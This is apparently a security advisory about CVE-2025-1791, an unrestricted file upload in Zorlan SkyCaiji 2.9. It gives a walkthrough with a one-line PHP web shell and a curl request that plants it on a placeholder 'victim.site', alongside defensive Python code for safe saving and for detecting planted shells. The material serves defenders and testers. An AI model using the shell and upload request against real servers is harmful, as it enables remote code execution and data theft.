CVE-2025-1791 - Critical Unrestricted File Upload in Zorlan SkyCaiji 2.9 (Complete Exploit Walkthrough)

A critical vulnerability, CVE-2025-1791, has been reported in Zorlan SkyCaiji 2.9. The flaw lets an attacker upload arbitrary files, including server-side scripts, through a vulnerable function, which can lead to remote code execution on the affected web server. The issue is in the fileAction function of vendor/skycaiji/app/admin/controller/Tool.php and is reached through the save_data argument. Exploit details have been disclosed publicly and may be used.

This article explains the vulnerability, demonstrates a step-by-step exploitation, and provides mitigation tips. Whether you are a sysadmin, penetration tester, or a Zorlan SkyCaiji user, read on to secure your sites.

What is Zorlan SkyCaiji?

Zorlan SkyCaiji is a content collection and scraping tool, mainly used by webmasters to automate data gathering for websites. Because its admin tooling runs on the web server itself, a flaw there exposes the whole site, not just the collected data.

- Product: Zorlan SkyCaiji 2.9
- Vulnerable File: vendor/skycaiji/app/admin/controller/Tool.php
- Vulnerable Function: fileAction (argument save_data)

How Does the Vulnerability Work?

The core issue resides in the improper handling of the save_data argument in the fileAction function. Input from the user is not correctly sanitized or validated before saving files to the server, allowing an attacker to upload any file, including PHP web shells or executable scripts.

To illustrate, here is a simplified reconstruction of the vulnerable pattern (not the verbatim project source):

public function fileAction() {
    // ... some code ...

    if(isset($_POST['save_data'])){
        // The request body is taken as-is: no type, size or content checks.
        $file = $_POST['save_data'];
        // In this simplified view $target_path is assumed to be derived from
        // request input too; nothing restricts the directory or the extension.
        file_put_contents($target_path, $file);
    }

    // ... some other code ...
}

- No file type validation.
- No filename/path checks.
- No check that a file write was expected at all, or that the caller is authorized to perform one.

This means an attacker can POST any data, including executable PHP code, and choose a filename such as shell.php to plant a backdoor on the server.
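Added example (Python, not SkyCaiji code, which is PHP): the unsafe save pattern beside a hardened routine that applies the missing checks, run against constructed attacker requests in a scratch directory. The allow-listed extensions, the fixed base directory and the filename rule are assumptions for illustration, not the project's settings.

```python
"""Unsafe versus hardened file-save logic, modelled on the pattern above.

Added example, not SkyCaiji code (the project is PHP); the allowed
extensions and the base directory are assumptions for illustration.
"""
import os
import re
import tempfile

# Constructed attacker payload: the one-line web shell from the article.
WEB_SHELL = "<?php system($_GET['cmd']); ?>"

# Assumption: the tool only ever needs to write plain data exports.
ALLOWED_EXTENSIONS = {".txt", ".csv", ".json"}
# One stem, one extension, conservative characters: this rejects "../x",
# "shell.php.txt" (multi-extension tricks) and anything with a slash.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.[a-z0-9]{1,8}$")
PHP_OPEN_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)


class UploadRejected(ValueError):
    """Raised by safe_save when a request fails one of the checks."""


def unsafe_save(base_dir, filename, save_data):
    """Mirror of the vulnerable pattern: request-controlled name and body
    go straight to disk with no validation."""
    target_path = os.path.join(base_dir, filename)
    with open(target_path, "w", encoding="utf-8") as fh:
        fh.write(save_data)
    return target_path


def safe_save(base_dir, filename, save_data):
    """Hardened version: fixed directory, allow-listed extension, no path
    escape, and no PHP code in the body even for allow-listed names."""
    if not SAFE_NAME.match(filename):
        raise UploadRejected("filename not in the allowed form")
    if os.path.splitext(filename)[1].lower() not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension not allow-listed")
    base_real = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base_real, filename))
    # Even after the name check, confirm the resolved path is a direct
    # child of the intended directory (symlinks, future regex changes).
    if os.path.dirname(target) != base_real:
        raise UploadRejected("target escapes the upload directory")
    if PHP_OPEN_TAG.search(save_data):
        raise UploadRejected("body contains a PHP open tag")
    with open(target, "w", encoding="utf-8") as fh:
        fh.write(save_data)
    return target


def demo():
    """Run constructed requests against both versions in a scratch dir.

    Returns (shell_written_by_unsafe_save, {case: outcome})."""
    cases = {
        "shell.php": "plain text",        # wrong extension
        "../shell.php": "plain text",     # path traversal
        "shell.php.txt": "plain text",    # double extension
        "export.txt": WEB_SHELL,          # acceptable name, hostile body
        "notes.txt": "plain text",        # the only legitimate request
    }
    outcomes = {}
    with tempfile.TemporaryDirectory() as base:
        planted = unsafe_save(base, "shell.php", WEB_SHELL)
        shell_written = os.path.isfile(planted)
        for name, body in cases.items():
            try:
                safe_save(base, name, body)
                outcomes[name] = "accepted"
            except UploadRejected as err:
                outcomes[name] = "rejected: " + str(err)
    return shell_written, outcomes


if __name__ == "__main__":
    for case, outcome in demo()[1].items():
        print(f"{case:16} {outcome}")
```

The content check on the body is deliberately kept even though the extension allow-list already blocks shell.php: a later web server misconfiguration (for example PHP handling enabled on the upload directory, or a multi-extension handler) should not turn an accepted .txt export into executable code.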

1. Prepare a PHP Web Shell

A minimal shell that runs whatever command is passed in the cmd parameter:

<?php system($_GET['cmd']); ?>

2. Upload It with a Crafted POST Request

For example with curl (the route /admin/tool/file and the filename parameter are illustrative; the exact route and parameter names depend on the installation's URL rewriting and on how the handler derives the target path):

curl -X POST http://victim.site/admin/tool/file \
  -d "save_data=<?php system(\$_GET['cmd']); ?>" \
  -d "filename=shell.php"

3. Access the Malicious File

The attacker then requests the planted file, passing a command:

http://victim.site/uploads/shell.php?cmd=ls

The web server interprets the PHP and returns the command output, giving the attacker remote command execution as the web server user.

Important: The actual path (uploads/, etc.) depends on the application, but the point is the file is placed where the web server will execute it.

Impact

- Remote Code Execution (RCE): the planted script runs as the web server user, from which full server takeover is often possible.
- Data Theft: that account can typically read the application's configuration, database credentials and the data SkyCaiji has collected.

Mitigation

- Update Immediately: If you run SkyCaiji 2.9, check the official SkyCaiji website for a fixed release (no official patch was listed at the time of writing).
- Restrict Access: Limit access to the /admin routes, for example by IP allow-listing or an additional authentication layer in front of the application.
- WAF Rules: Use a Web Application Firewall to block requests to the file-saving handler whose body contains PHP open tags or whose filename carries a script extension.
- Upload Directory Hardening: Make sure the web server never interprets scripts from directories the application can write to (disable PHP handling there). The Unix execute bit on the file does not protect you: PHP files are run by the web server regardless of it.
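If you suspect a host was hit before these mitigations were in place, a quick triage is to scan the site's writable directories for scripts that feed request data straight into a command or eval sink, and for PHP tags hiding in files that are not supposed to be scripts. The scanner below is an added example, not a SkyCaiji feature; its heuristics are generic and the sample files it scans are constructed inline.

```python
"""Triage scan for planted web shells in a PHP site's writable directories.

Added example, not a SkyCaiji feature: the heuristics below are generic
and the sample files are constructed here for the demonstration.
"""
import os
import re
import tempfile

# A dangerous sink whose argument list, on the same statement, reads
# directly from request data: the shape of a one-line web shell.
REQUEST_SINK = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
    r"\s*\([^;\n]*?\$_(GET|POST|REQUEST|COOKIE)\s*\[",
    re.IGNORECASE,
)
PHP_OPEN_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)
# Extensions the web server is expected to interpret as PHP.
SCRIPT_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phar"}


def classify(path, data):
    """Return the list of reasons a file looks suspicious (empty if clean)."""
    reasons = []
    if REQUEST_SINK.search(data):
        reasons.append("request-controlled sink")
    if os.path.splitext(path)[1].lower() not in SCRIPT_EXTS and PHP_OPEN_TAG.search(data):
        reasons.append("php tag in non-script file")
    return reasons


def scan_tree(root, max_bytes=1_000_000):
    """Walk root and return sorted (relative path, reasons) for flagged files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            reasons = classify(path, data)
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, reasons))
    return sorted(findings)


def demo():
    """Build a small constructed site tree and scan it."""
    samples = {
        "uploads/shell.php": "<?php system($_GET['cmd']); ?>",
        "uploads/export.txt": "<?php eval($_POST['x']); ?>",
        "app/Index.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
        "uploads/report.csv": "id,title\n1,hello\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, "->", ", ".join(reasons))
```

Run scan_tree against the real web root and the application's upload or cache directories; treat every hit as a lead to confirm by hand, and compare file modification times against web server logs for the POST that wrote them. A file the heuristics miss is still possible (obfuscated shells, encoded payloads), so this is a first pass, not proof of a clean host.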

References

- NVD Entry for CVE-2025-1791
- SkyCaiji Main Site
- Original Exploit Disclosure *(replace with the actual link when available)*

Conclusion

CVE-2025-1791 is a serious wake-up call for all users of Zorlan SkyCaiji 2.9. Left unpatched, sites using the platform are at high risk of compromise. Immediate action is needed: update your software, audit your systems, and keep an eye on new advisories.

Timeline

Published on: 03/01/2025 14:15:34 UTC
Last modified on: 03/03/2025 21:15:16 UTC